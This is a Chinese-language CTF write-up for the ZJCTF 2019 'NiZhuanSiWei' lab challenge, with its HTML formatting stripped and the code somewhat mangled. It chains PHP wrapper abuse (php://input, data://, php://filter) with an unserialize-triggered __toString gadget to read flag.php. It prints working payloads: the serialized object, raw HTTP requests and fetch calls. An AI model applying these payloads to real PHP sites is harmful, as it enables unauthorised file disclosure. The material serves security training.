[ZJCTF 2019]NiZhuanSiWei

00.搭环境写wp的时候buu靶场暂时访问不了因此我们根据题目所给的链接用docker自己搭起来span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basicdocker-compose up -d //docker先搭起来 http://192.168.155.1:8302/ //ipconfig查看自己的IPv4 地址ip都可以192开头也行 /code/span/span访问靶场地址可以看到源代码我们copy下来分析一下span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-php?php $text $_GET[text]; $file $_GET[file]; $password $_GET[password]; if(isset($text)(file_get_contents($text,r)welcome to the zjctf)){ echo brh1.file_get_contents($text,r)./h1/br; if(preg_match(/flag/,$file)){ echo Not now!; exit(); }else{ include($file); //useless.php $password unserialize($password); echo $password; } } else{ highlight_file(__FILE__); } ?/code/span/span01. 伪协议任意文件读取这道题一共设置了三个Get参数没有任何过滤。span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basic$text $_GET[text]; $file $_GET[file]; $password $_GET[password]; if(isset($text)(file_get_contents($text,r)welcome to the zjctf)){/code/span/span先看第一个text参数的作用我们需要让text参数不为空isset($text)并且要使file_get_contents($text,r)读取的内容为welcome to the zjctf字符串这样我们就能进入第一层if循环且用html样式输出h1标签的welcome to the zjctf代码如下span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basicecho brh1.file_get_contents($text,r)./h1/br;/code/span/spanfile_get_contents这个函数是读取文件内容的怎么使他等于我们想要的字符串呢这里的话就需要用到伪协议绕过php://input我们这里构造请求:::infoGet请求?textphp://inputPost请求welcome to the zjctf:::这样file_get_contents就会从 POST 输入流中读取数据从而绕过第一层检测。emm但是不出意外的话就出意外了并没有h1高亮显示welcome to the zjctf没有反应于是这里我们换一种方式用data://协议直接Get请求span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basicd2VsY29tZSB0byB0aGUgempjdGY //welcome to the zjctf ---- base64编码 ?textdata://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY/code/span/span结果如下成功h1高亮显示welcome to the zjctf。后续我测试了在控制台上发包确实是能成功返回的但是不知道为什么用hackbar就是不行如下为javaScript发包代码控制台span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-javascriptfetch(http://192.168.155.1:8302/?textphp://input, { method: POST, body: welcome to the zjctf, headers: { Content-Type: application/x-www-form-urlencoded } }).then(res res.text()).then(data console.log(data));/code/span/span同理在burp上也是可以的02. 文件包含 反序列化现在我们接着往下走我们现在就是要利用这个include文件包含操作去包含文件虽然他直接限制了flag文件防止我们直接包含font stylecolor:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);flag.php/font但并没有过滤其他文件。那我们可以按照题目提示先包含font stylecolor:rgb(0, 0, 0);background-color:rgba(0, 0, 0, 0);useless.php/font看看这个是什么文件看文件名猜测涉及序列化操作span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-javascriptif(preg_match(/flag/,$file)){ echo Not now!; exit(); }else{ include($file); //useless.php $password unserialize($password); echo $password; } }/code/span/span它包含get参数file那我们的paylaod如下利用伪协议php://filterspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basicfilephp://filter/readconvert.base64-encode/resourceuseless.php/code/span/span使用burp返回包如下如果用hackbar的话直接用只涉及get请求的payloadspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-basic?textdata://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGYfilephp://filter/readconvert.base64-encode/resourceuseless.php/code/span/span会返回一串base64编码的结果我们解码之后copy下来useless.php文件内容如下span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-php?php class Flag{ //flag.php public $file; public function __tostring(){ if(isset($this-file)){ echo file_get_contents($this-file); echo br; return (U R SO CLOSE !///COME ON PLZ); } } } ? /code/span/span这里的Flag类用到了魔术方法__tostring还用到了file_get_contents并且属性$file是我们可控的那这里我们就可以去构造一个属性$file等于flag.php并且将它做序列化操作并将序列化后的数据参数传递给password注意参数file需要包含useless.php我们可以看到在index里面$password是会进行反序列化操作的服务器将我们的反序列化的paylaod数据重新反序列化为一个对象在之后进行了echo $password操作此时由于$password是对象将对象当做字符串处理会自动触发Flag类里的__tostring魔术方法从而导致执行echo file_get_contents($this-file);而此时的$file属性已经是被我们修改后的flag.phpfile_get_contents函数就会去执行文件读取操作去读取flag.php的内容从而输出flagspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-php }else{ include($file); //useless.php $password unserialize($password); echo $password; } }/code/span/span根据提示我们去读取flag.phpspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-php?php class Flag{ public $file flag.php; } echo serialize(new Flag()); ?/code/span/span输出span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-phpO:4:Flag:1:{s:4:file;s:8:flag.php;}/code/span/spanpayload如下span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-phpPOST /?textphp://inputfileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;} HTTP/1.1 Host: 192.168.45.1:8302 Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9,en;q0.8,en-GB;q0.7,en-US;q0.6 Connection: close Content-Length: 20 welcome to the zjctf/code/span/span或者span stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-php/?textdata://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGYfileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;}/code/span/spanflag在注释中需要看源代码流程图如下最开始解题时的控制台js代码绕ifspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-phpfetch(http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?textphp://input, { method: POST, body: welcome to the zjctf, headers: { Content-Type: application/x-www-form-urlencoded } }).then(res res.text()).then(data console.log(data));/code/span/span读useless.phpspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-phpfetch(http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?textphp://inputfilephp://filter/convert.base64-encode/resourceuseless.php, { method: POST, body: welcome to the zjctf, headers: { Content-Type: application/x-www-form-urlencoded } }).then(res res.text()).then(data console.log(data));/code/span/span反序列化拿flag.phpspan stylebackground-color:#f5f5faspan stylecolor:#23263bcode classlanguage-phpfetch(http://9a71c521-6c7a-4823-b0e7-c7145398cafe.node5.buuoj.cn:81/?textphp://inputfileuseless.phppasswordO:4:Flag:1:{s:4:file;s:8:flag.php;}, { method: POST, body: welcome to the zjctf, headers: { Content-Type: application/x-www-form-urlencoded } }).then(res res.text()).then(data console.log(data));/code/span/span